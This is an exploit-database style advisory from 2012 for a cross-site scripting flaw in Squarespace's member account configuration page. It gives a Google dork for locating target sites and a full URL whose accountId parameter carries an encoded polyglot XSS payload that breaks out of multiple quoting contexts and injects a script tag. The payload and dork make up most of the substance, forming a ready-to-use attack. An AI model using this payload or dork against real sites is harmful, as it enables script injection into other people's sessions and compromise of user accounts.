# Exploit Title: Squarespace Cross Site Scripting
# Date: 26.02.2012
# Author: Sony
# Software Link: http://www.squarespace.com/
# Google Dorks: powered by squarespace site:edu (or org or com or what you
want)
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/squarespace-cross-site-scripting.html
..................................................................

What is Squarespace?

http://en.wikipedia.org/wiki/Squarespace
http://blog-software-review.toptenreviews.com/

We have xss in the Squarespace.

But we can see this only after "member login"..

http://3.bp.blogspot.com/-GZYqEDWPk94/T0ovIhvAmYI/AAAAAAAAAng/nBkYCxxwH-Q/s1600/spa.JPG


http://sonystyles.squarespace.com/display/configuration/CreateOrModifyMemberAccount?accountId=2095672%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

http://3.bp.blogspot.com/-rCW6pFCVQ5E/T0ouhHXOpNI/AAAAAAAAAnU/0EdMzfK0ALs/s1600/space.JPG